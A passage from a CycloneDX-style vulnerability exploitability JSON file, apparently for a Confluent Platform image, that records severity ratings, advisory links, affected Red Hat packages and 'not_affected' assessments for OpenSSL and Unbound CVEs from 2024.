          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-41996",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-41996"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-41996"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://dheatattack.gitlab.io/details/"
        },
        {
          "url": "https://dheatattack.gitlab.io/faq/"
        },
        {
          "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1"
        },
        {
          "url": "https://github.com/openssl/openssl/issues/17374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996"
        },
        {
          "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
        }
      ],
      "published": "2024-08-26T06:15:04+00:00",
      "updated": "2026-06-17T07:48:36+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-43167",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        476
      ],
      "description": "DISPUTE NOTE: this issue does not pose a security risk as it (according to analysis by the original software developer, NLnet Labs) falls within the expected functionality and security controls of the application. Red Hat has made a claim that there is a security risk within Red Hat products. NLnet Labs has no further information about the claim, and suggests that affected Red Hat customers refer to available Red Hat documentation or support channels. ORIGINAL DESCRIPTION: A NULL pointer dereference flaw was found in the ub_ctx_set_fwd function in Unbound. This issue could allow an attacker who can invoke specific sequences of API calls to cause a segmentation fault. When certain API functions such as ub_ctx_set_fwd and ub_ctx_resolvconf are called in a particular order, the program attempts to read from a NULL pointer, leading to a crash. This issue can result in a denial of service by causing the application to terminate unexpectedly.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-43167"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/08/16/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-43167"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303456"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/issues/1072"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1073"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1073/files"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00046.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43167"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6998-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-43167"
        }
      ],
      "published": "2024-08-12T13:38:35+00:00",
      "updated": "2026-06-17T07:50:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-43168",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        122
      ],
      "description": "DISPUTE NOTE: this issue does not pose a security risk as it (according to analysis by the original software developer, NLnet Labs) falls within the expected functionality and security controls of the application. Red Hat has made a claim that there is a security risk within Red Hat products. NLnet Labs has no further information about the claim, and suggests that affected Red Hat customers refer to available Red Hat documentation or support channels. ORIGINAL DESCRIPTION: A heap-buffer-overflow flaw was found in the cfg_mark_ports function within Unbound's config_file.c, which can lead to memory corruption. This issue could allow an attacker with local access to provide specially crafted input, potentially causing the application to crash or allowing arbitrary code execution. This could result in a denial of service or unauthorized actions on the system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-43168"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-43168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303462"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/issues/1039"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1040"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/pull/1040/files"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00046.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43168"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6998-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-43168"
        }
      ],
      "published": "2024-08-12T13:38:36+00:00",
      "updated": "2026-06-17T07:50:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
